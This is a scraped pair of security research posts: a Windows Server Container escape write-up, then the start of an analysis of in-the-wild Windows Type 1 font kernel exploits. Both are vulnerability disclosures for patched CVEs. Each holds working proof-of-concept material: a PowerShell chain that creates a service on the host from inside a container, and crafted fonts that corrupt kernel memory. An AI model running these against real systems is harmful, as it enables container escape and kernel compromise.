Fast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible.

Microsoft had not patched the issue and it was still exploitable. They hadn’t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient.

However, I wasn’t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.

While I wasn’t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It’s known to be problematic, but how problematic?

Research Process

The first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container.

Setting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn’t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the Go wrapper.

Realistically it’s best to just use Docker which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there’s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.

As an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker’s server silo support.

Fortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:

FROM mcr.microsoft.com/windows/servercore:20H2

USER ContainerUser

COPY NtObjectManager c:/NtObjectManager

CMD [ "powershell", "-noexit", "-command", \

  "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

This docker file will download a Windows Server Core 20H2 container image from the Microsoft Container Registry, copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don’t specify a user it’ll run as ContainerAdministrator by default.

Note, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you’re trying to replicate this you might need to change the name for the container image.

Create a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my PowerShell module into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.

C:\container> docker build -t test_image .

Step 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2

 ---> b29adf5cd4f0

Step 2/4 : USER ContainerUser

 ---> Running in ac03df015872

Removing intermediate container ac03df015872

 ---> 31b9978b5f34

Step 3/4 : COPY NtObjectManager c:/NtObjectManager

 ---> fa42b3e6a37f

Step 4/4 : CMD [ "powershell", "-noexit", "-command",   "Import-Module c:/NtObjectManager/NtObjectManager.psd1" ]

 ---> Running in 86cad2271d38

Removing intermediate container 86cad2271d38

 ---> e7d150417261

Successfully built e7d150417261

Successfully tagged test_image:latest

C:\container> docker run --isolation=process -it test_image

PS>

I wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the --isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation.

I now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.

PS> Get-Process -Name CExecSvc

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName

-------  ------    -----      -----     ------     --  -- -----------

     86       6     1044       5020              4560   6 CExecSvc

With a running container it was time to start poking around to see what’s available. The first thing I did was dump the ContainerUser’s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.

PS> Show-NtTokenEffective -User -Group -Privilege

USER INFORMATION

----------------

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

GROUP SID INFORMATION

-----------------

Name                                   Attributes

----                                   ----------

Mandatory Label\High Mandatory Level   Integrity, ...

Everyone                               Mandatory, ...

BUILTIN\Users                          Mandatory, ...

NT AUTHORITY\SERVICE                   Mandatory, ...

CONSOLE LOGON                          Mandatory, ...

NT AUTHORITY\Authenticated Users       Mandatory, ...

NT AUTHORITY\This Organization         Mandatory, ...

NT AUTHORITY\LogonSessionId_0_10357759 Mandatory, ...

LOCAL                                  Mandatory, ...

User Manager\AllContainers             Mandatory, ...

PRIVILEGE INFORMATION

---------------------

Name                          Luid              Enabled

----                          ----              -------

SeChangeNotifyPrivilege       00000000-00000017 True

SeImpersonatePrivilege        00000000-0000001D True

SeCreateGlobalPrivilege       00000000-0000001E True

SeIncreaseWorkingSetPrivilege 00000000-00000021 False

The groups didn’t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.

That was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn’t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public RogueWinRM exploit to get a SYSTEM token as long as WinRM isn’t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.

NextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.

PS> ls NtObject:\Device

Name                                              TypeName

----                                              --------

Ip                                                SymbolicLink

Tcp6                                              SymbolicLink

Http                                              Directory

Ip6                                               SymbolicLink

ahcache                                           SymbolicLink

WMIDataDevice                                     SymbolicLink

LanmanDatagramReceiver                            SymbolicLink

Tcp                                               SymbolicLink

LanmanRedirector                                  SymbolicLink

DxgKrnl                                           SymbolicLink

ConDrv                                            SymbolicLink

Null                                              SymbolicLink

MailslotRedirector                                SymbolicLink

NamedPipe                                         Device

Udp6                                              SymbolicLink

VhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink

KsecDD                                            SymbolicLink

DeviceApi                                         SymbolicLink

MountPointManager                                 Device

...

Interestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There’s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.

What about the registry? The container should be providing its own Registry hives and so there shouldn’t be anything accessible outside of that. After a few tests I noticed something very odd.

PS> ls HKLM:\SOFTWARE | Select-Object Name

Name

----

HKEY_LOCAL_MACHINE\SOFTWARE\Classes

HKEY_LOCAL_MACHINE\SOFTWARE\Clients

HKEY_LOCAL_MACHINE\SOFTWARE\DefaultUserEnvironment

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft

HKEY_LOCAL_MACHINE\SOFTWARE\ODBC

HKEY_LOCAL_MACHINE\SOFTWARE\OpenSSH

HKEY_LOCAL_MACHINE\SOFTWARE\Policies

HKEY_LOCAL_MACHINE\SOFTWARE\RegisteredApplications

HKEY_LOCAL_MACHINE\SOFTWARE\Setup

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node

PS> ls NtObject:\REGISTRY\MACHINE\SOFTWARE | Select-Object Name

Name

----

Classes

Clients

DefaultUserEnvironment

Docker Inc.

Intel

Macromedia

Microsoft

ODBC

OEM

OpenSSH

Partner

Policies

RegisteredApplications

Windows

WOW6432Node

The first command is querying the local machine SOFTWARE hive using the built-in Registry drive provider. The second command is using my module’s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:

PS> ls NtObject:\REGISTRY\USER | Select-Object Name

Name

----

.DEFAULT

S-1-5-19

S-1-5-20

S-1-5-21-426062036-3400565534-2975477557-1001

S-1-5-21-426062036-3400565534-2975477557-1001_Classes

S-1-5-21-426062036-3400565534-2975477557-1003

S-1-5-18

PS> Get-NtSid

Name                       Sid

----                       ---

User Manager\ContainerUser S-1-5-93-2-2

No, it still looked wrong. The ContainerUser’s SID is S-1-5-93-2-2, you’d expect to see a loaded hive for that user SID. However you don’t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container.

Something funny was going on. However, this behavior is something I’ve seen before. Back in 2016 I reported a bug with application hives where you couldn’t open the \REGISTRY\A attachment point directly, but you could if you opened \REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module’s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.

This grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key’s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host’s registry hives.

The fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.

A Little Bit of Reverse Engineering

While just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.

The main enforcement mechanism used by the kernel to provide the container’s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You’d think the kernel would only have a few functions which would return the current silo state. Unfortunately you’d be wrong, the following is a short list of the functions I checked:

IoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo

Of course that’s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn’t going to be comprehensive, for various reasons:

  1. We’re only checking for bad checks, not the lack of a check.
  2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.
  3. We’re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we’re not looking at.

The first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that’s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive.

For example if you put a symbolic link in the current user’s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.

BOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {

  if (PsIsCurrentThreadInServerSilo() 

    || !TargetHive

    || TargetHive == SourceHive) {

    return TRUE;

  }

  if (SourceHive->Flags.Trusted)

    return FALSE;

  // Check trust list.

}

Looking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I’d speculate that during development the registry overlays couldn’t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added.

To exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it’s not documented). When setting the configuration Win32k would create a known key in the current user’s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don’t believe this primitive could be directly combined with the registry silo escape issue but I didn’t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.

The second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.

POBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {

  if (Silo) {

    PPSP_STORAGE Storage = Silo->Storage;

    PPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];

    if (Slot->Present)

      return Slot->Value;

  }

  return ObpRootDirectoryObject;

}

We can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn’t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory.

This code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.

PEJOB silo = PsGetCurrentSilo();

Root = OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(silo);

Okay, so the silo is coming from PsGetCurrentSilo. What does that do?

PEJOB PsGetCurrentSilo() {

  PETHREAD Thread = PsGetCurrentThread();

  PEJOB silo = Thread->Silo;

  if (silo == (PEJOB)-3) {

    silo = Thread->Tcb.Process->Job;

    while(silo) {

      if (silo->JobFlags & EJOB_SILO) {

        break;

      }

      silo = silo->ParentJob;

    }

  }

  return silo;

}

A silo can be associated with a thread, through impersonation or as can be one job in the hierarchy of jobs associated with a process. This function first checks if the thread is in a silo. If not, signified by the -3 placeholder, it searches for any job in the job hierarchy for the process for anything which has the JOB_SILO flag set. If a silo is found, it’s returned from the function, otherwise NULL would be returned.

This is a problem, as it’s not explicitly checking for a server silo. I mentioned earlier that there are two types of silo, application and server. While creating a new server silo requires administrator privileges, creating an application silo requires no privileges at all. Therefore to trick the object manager to using the root directory all we need to do is:

  1. Create an application silo.
  2. Assign it to a process.
  3. Fully access the root of the object manager namespace.

This is basically a more powerful version of the global symlink vulnerability but requires no administrator privileges to function. Again, as with the registry issue you’re still limited in what you can modify outside of the containers based on the token in the container. But you can read files on disk, or interact with ALPC ports on the host system.

The exploit in PowerShell is pretty straightforward using my toolchain:

PS> $root = Get-NtDirectory "\"

PS> $root.FullPath

\

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> $root.FullPath

\Silos\748

To test the exploit we first open the current root directory object and then print its full path as the kernel sees it. Even though the silo root isn’t really a root directory the kernel makes it look like it is by returning a single backslash as the path.

We then create the application silo using the New-NtJob command. You need to specify NoSiloRootDirectory to prevent the code trying to create a root directory which we don’t want and can’t be done from a non-administrator account anyway. We can then assign the application silo to the process.

Now we can check the root directory path again. We now find the root directory is really called \Silos\748 instead of just a single backslash. This is because the kernel is now using the root root directory. At this point you can access resources on the host through the object manager.

Chaining the Exploits

We can now combine these issues together to escape the container completely from ContainerUser. First get hold of an administrator token through something like RogueWinRM, you can then impersonate it due to having SeImpersonatePrivilege. Then you can use the object manager root directory issue to access the host’s service control manager (SCM) using the ALPC port to create a new service. You don’t even need to copy an executable outside the container as the system volume for the container is an accessible device on the host we can just access.

As far as the host’s SCM is concerned you’re an administrator and so it’ll grant you full access to create an arbitrary service. However, when that service starts it’ll run in the host, not in the container, removing all restrictions. One quirk which can make exploitation unreliable is the SCM’s RPC handle can be cached by the Win32 APIs. If any connection is made to the SCM in any part of PowerShell before installing the service you will end up accessing the container’s SCM, not the hosts.

To get around this issue we can just access the RPC service directly using NtObjectManager’s RPC commands.

PS> $imp = $token.Impersonate()

PS> $sym_path = "$env:SystemDrive\symbols"

PS> mkdir $sym_path | Out-Null

PS> $services_path = "$env:SystemRoot\system32\services.exe"

PS> $cmd = 'cmd /C echo "Hello World" > \hello.txt'

# You can also use the following to run a container based executable.

#$cmd = Use-NtObject($f = Get-NtFile -Win32Path "demo.exe") {

#   "\\.\GLOBALROOT" + $f.FullPath

#}

PS> Get-Win32ModuleSymbolFile -Path $services_path -OutPath $sym_path

PS> $rpc = Get-RpcServer $services_path -SymbolPath $sym_path | 

   Select-RpcServer -InterfaceId '367abb81-9844-35f1-ad32-98f038001003'

PS> $client = Get-RpcClient $rpc

PS> $silo = New-NtJob -CreateSilo -NoSiloRootDirectory

PS> Set-NtProcessJob $silo -Current

PS> Connect-RpcClient $client -EndpointPath ntsvcs

PS> $scm = $client.ROpenSCManagerW([NullString]::Value, `

 [NullString]::Value, `

 [NtApiDotNet.Win32.ServiceControlManagerAccessRights]::CreateService)

PS> $service = $client.RCreateServiceW($scm.p3, "GreatEscape", "", `

 [NtApiDotNet.Win32.ServiceAccessRights]::Start, 0x10, 0x3, 0, $cmd, `

 [NullString]::Value, $null, $null, 0, [NullString]::Value, $null, 0)

PS> $client.RStartServiceW($service.p15, 0, $null)

For this code to work it’s expected you have an administrator token in the $token variable to impersonate. Getting that token is left as an exercise for the reader. When you run it in a container the result should be the file hello.txt written to the root of the host’s system drive.

Getting the Issues Fixed

I have some server silo escapes, now what? I would prefer to get them fixed, however as already mentioned MSRC servicing criteria pointed out that Windows Server Containers are not a supported security boundary.

I decided to report the registry symbolic link issue immediately, as I could argue that was something which would allow privilege escalation inside a container from a non-administrator. This would fit within the scope of a normal bug I’d find in Windows, it just required a special environment to function. This was issue 2120 which was fixed in February 2021 as CVE-2021-24096. The fix was pretty straightforward, the call to PsIsCurrentThreadInServerSilo was removed as it was presumably redundant.

The issue with ContainerUser having SeImpersonatePrivilege could be by design. I couldn’t find any official Microsoft or Docker documentation describing the behavior so I was wary of reporting it. That would be like reporting that a normal service account has the privilege, which is by design. So I held off on reporting this issue until I had a better understanding of the security expectations.

The situation with the other two silo escapes was more complicated as they explicitly crossed an undefended boundary. There was little point reporting them to Microsoft if they wouldn’t be fixed. There would be more value in publicly releasing the information so that any users of the containers could try and find mitigating controls, or stop using Windows Server Container for anything where untrusted code could ever run.

After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. This means that Daniel’s global symbolic link bug which kicked this all off still wouldn’t be eligible as it required SeTcbPrivilege which only administrators should be able to get. It might be fixed at some later point, but not as part of a bulletin.

I reported the three other issues (the ContainerUser issue was also considered to be in scope) as 2127, 2128 and 2129. These were all fixed in March 2021 as CVE-2021-26891, CVE-2021-26865 and CVE-2021-26864 respectively.

Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.

Conclusions

The decision by Microsoft to not support Windows Server Containers as a security boundary looks to be a valid one, as there’s just so much attack surface here. While I managed to get four issues fixed I doubt that they’re the only ones which could be discovered and exploited. Ideally you should never run untrusted workloads in a Windows Server Container, but then it also probably shouldn’t provide remotely accessible services either. The only realistic use case for them is for internally visible services with little to no interactions with the rest of the world. The official guidance for GKE is to not use Windows Server Containers in hostile multi-tenancy scenarios. This is covered in the GKE documentation here.

Obviously, the recommended approach is to use Hyper-V isolation. That moves the needle and Hyper-V is at least a supported security boundary. However container escapes are still useful as getting full access to the hosting VM could be quite important in any successful escape. Not everyone can run Hyper-V though, which is why GKE isn't currently using it.

...more

In-the-Wild Series: Windows Exploits

Published: 2021-01-12 17:37:00

Popularity: 48

Author: Ryan

🤖: "Exploit city"

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[2];

  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {

    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];

  }

  for (int i = 0; i < 2; i++) {

    int values_read = GetOpenFixedArray(values, g_font->numMasters);

    if (values_read != g_font->numMasters) {

      return -8;

    }

    for (int num = 0; num < g_font->numMasters; num++) {

      ptrs[num][i] = values[num];

    }

  }

  return 0;

}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...

RSP + 0x30

ptrs[0]

RSP + 0x38

ptrs[1]

RSP + 0x40

saved RDI

RSP + 0x48

return address

RSP + 0x50

values[0 .. 1]

RSP + 0x58

saved RBX

RSP + 0x60

saved RSI

...

The green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/WeightVector [0 0 0 0 0] def

/Private begin

/Blend begin

/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

The first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.

Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141

rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000

rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000

 r8=0000000000000000  r9=000000000000000e r10=0000000000000000

r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei pl nz na po cy

ATMFD+0x22144:

fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {

    procs->BlendDesignPositions(i, &values[i]);

  }

  return 0;

}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]

/Private begin

/Blend begin

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

In the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.

Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000

rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000

rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002

 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000

r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei ng nz na po nc

ffffffff`41414141 ??              ???

Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

